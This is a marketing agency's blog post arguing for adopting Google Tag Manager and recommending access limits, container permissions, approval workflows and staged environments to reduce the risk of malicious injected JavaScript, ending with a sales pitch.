Google Tag Manager (GTM) is a powerful tool that enables marketing teams to track and improve their conversions. However, your engineering team might balk at implementing it on security grounds. This can result in lost ROI, lost opportunities to experiment, and lost growth.
It doesn’t have to be this way. Here’s why we view GTM as critical – and how you can partner with engineering to implement it securely.
What is Google Tag Manager?
Google Tag Manager is a deployment platform and management UI for hosting analytics and other tags that can track various events on your Web site, Web application, or smartphone apps. A tag can be anything from an embedded analytics pixel to arbitrary JavaScript. Popular products used include Google Analytics (general analytics), Microsoft Clarity (heat mapping), and Facebook (ad campaign event tracking).
You can specify how a given tag gets triggered. For example, it could trigger on a page load, after a percentage of page script, or in response to a form submission.
Advantages of Google Tag Manager
Why implement Google Tag Manager? The simplest answer is that
it enables marketing teams to manage Web site analytics tags without going through engineering.
Without GTM, there are only two ways for marketing to change tags on Web and app properties. One is to provide direct access to the Web site to enable changing the site’s HTML and templates directly. That requires marketing to have a lot of technical how-to. It also requires granting what is, frankly, overprivileged and potentially dangerous access.
The other is to ask engineering to make the change through their official dev promotion process. That makes engineering a bottleneck for all tag change requests.
By contrast, with GTM, engineering only needs to add the Google Tag Manager JavaScript code once. After that, marketers can add pixels and JavaScript without touching code. And they can make small tweaks - swap out analytics code, reconfigure tracking pixels, run experiments - without bothering their engineers.
GTM also makes the simple things simple. You can load tags only on certain pages, pause/unpause tags, and more - all without coding.
Finally, using GTM unlocks a number of advanced features you’d otherwise have to program in to your Web site. This included managing versions, environments, and previewing changes prior to deployment.
Security challenges with Google Tag Manager
Unfortunately, from engineering’s perspective, there’s a potentially scary down side to GTM.
As noted above, using Google Tag Manager, you can insert arbitrary JavaScript into your company’s Web site. That opens up the door to two frightening scenarios:
- A malicious actor within your company uses this ability to insert JavaScript that steals sensitive customer data (addresses, credit cards, etc.).
- Someone on your team unknowingly copy/pastes malicious code from an arbitrary Web site that does the same thing.
This is why engineering teams might object to using GTM. In their eyes, the risk outweighs the reward.
How to implement Google Tag Manager securely
Frankly, this is a legitimate fear. As many as 58% of incidents involving compromised sensitive data are due to insider threats. Limiting internal access according to the principle of least privilege isn’t just a good idea - it’s mandatory.
However, from our standpoint, there’s too much downside in not implementing GTM.
Forcing all tag changes through engineering can increase the time it takes to deploy a change from one day to up to one month. This slows down your ability to deploy new analytics, make changes to understand user behavior, or adjust conversion behavior. These limitations can lower your total Return on Ad Spend (ROAS).
That’s why we recommend to our clients that they work closely with their engineering team to implement strict security controls and a workflow process around GTM changes. Specifically, we recommend the following:
Limit access
GTM enables you to specify who in your company has access to tag management. You can control who has the right to add, edit, and publish tags down to a pretty granular level.
So, first things first: don’t give access to anyone who doesn’t need it. Keep the number of people who require GTM access to an absolute minimum.
Be especially wary of granting access to temporary contractors. If you must, make sure they’re a fully vetted, insured, and trusted partner.
Remove unneeded access immediately
This is a big one and many companies forget to do it. If someone leaves their company, remove their GTM (and any other related) access immediately. We’ve seen companies fail to do this, resulting in employees who retain access to private business data for months - or even years - after they’re terminated.
One security measure that helps here is never granting access to anyone outside of your organization. If your company uses Google Business, it can be tempting to just add their gmail.com address to GTM. This ups the odds that you’ll neglect to remove access, which increases the risk of a data leak.
Instead, if someone needs access to data within your organization, create an organizational account for them. That way, when their time working with your org is done, your Google Business administrator can just delete their account, removing their access to all organizational resources - including GTM - instantly.
Use granular container management
Google Tag Manager supports containers, which segments your tags and governing rules into buckets. GTM supports defining containers for different Web sites, AMP pages, and Android and iOS apps. Furthermore, you can grant four different types of access permissions per container:
- Read
- Edit
- Approve
- Publish
Grant access only to the containers that a given individual needs. For example, a member of your team might be responsible for marketing on a subdomain but not for the main Web site. In this case, you can grant them Edit access to the subdomain’s container but only Read access to the main Web site’s container.
Use an approval workflow
These granular container permissions mean you can also set up an approval workflow for GTM changes. An approval workflow can keep engineering stakeholders in the loop without pushing the overhead of shipping code changes into their laps.
For example, you may define container permissions for a Web container as follows:
- Marketing Assistant: Has Read, Edit container permissions
- Technical Approver (Software Development Engineer/Manager, IT Support Engineer, or similar technical role): Has Edit and Approve container permissions
- Marketing Manager: Has Edit and Publish permissions
With these permissions set up, an approval workflow might work as follows:
- The Marketing Assistant inserts a new JavaScript tag
- The Technical Approver reviews the code in GTM and Approves it if it looks non-malicious, or Denies it and sends it back to the Marketing Assistant if it looks questionable
- One approved, the Marketing Manager can push the new container version
You can make this process even more rigorous by using environment support in GTM. With environments, you can create separate containers for different stages (e.g., dev, staging, production) of your Web site or app. You can then preview changes to stakeholders in a pre-prod environment before pushing them live to production.
Conclusion
As Uncle Ben said, with great power comes great responsibility. Google Tag Manager makes it easy to adjust marketing tactics on the fly - but carries a huge potential risk. Fortunately, GTM also contains the tools you need to develop a safe and secure workflow for promoting changes without sacrificing speed.
Need help running Google Tag Manager? ercule can get you set up with GTM as well as a full content strategy for fueling growth. Contact us today to get the ball rolling.